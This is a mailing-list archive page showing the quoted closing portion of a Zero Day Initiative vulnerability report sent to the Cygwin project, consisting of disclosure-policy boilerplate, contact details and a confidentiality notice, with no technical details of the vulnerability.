> This vulnerability was discovered by:
> solid-snail working with Trend Micro Zero Day Initiative
>
> -- FURTHER DETAILS ------------------------------
>
> Supporting files:
>
>
> If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.
>
> Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up to the deadline, please coordinate with us so that we may release our advisory detailing the issue. If the 120-day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations, so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:
>
> Zero Day Initiative
> zdi-disclosures AT trendmicro DOT com
>
> The PGP key used for all ZDI vendor communications is available from:
>
>    http://www.zerodayinitiative.com/documents/disclosures-pgp-key.asc
>
> -- INFORMATION ABOUT THE ZDI --------------------
> Established by TippingPoint and acquired by Trend Micro, the Zero Day Initiative (ZDI) neither re-sells vulnerability details nor exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its Trend Micro TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available.
>
> Please contact us for further details or refer to:
>
>    http://www.zerodayinitiative.com
>
> -- DISCLOSURE POLICY ----------------------------
>
> Our vulnerability disclosure policy is available online at:
>
>    http://www.zerodayinitiative.com/advisories/disclosure_policy/
>
> TREND MICRO EMAIL NOTICE
>
> The information contained in this email and any attachments is confidential and may be subject to copyright or other intellectual property protection. If you are not the intended recipient, you are not authorized to use or disclose this information, and we request that you notify us by reply mail or telephone and delete the original message from your mail system.
>
> For details about what personal information we collect and why, please see our Privacy Notice on our website at: Read privacy policy<http://www.trendmicro.com/privacy>
>


-- 
Problem reports:      https://cygwin.com/problems.html
FAQ:                  https://cygwin.com/faq/
Documentation:        https://cygwin.com/docs.html
Unsubscribe info:     https://cygwin.com/ml/#unsubscribe-simple

- Raw text -


  webmaster     delorie software   privacy  
  Copyright © 2019   by DJ Delorie     Updated Jul 2019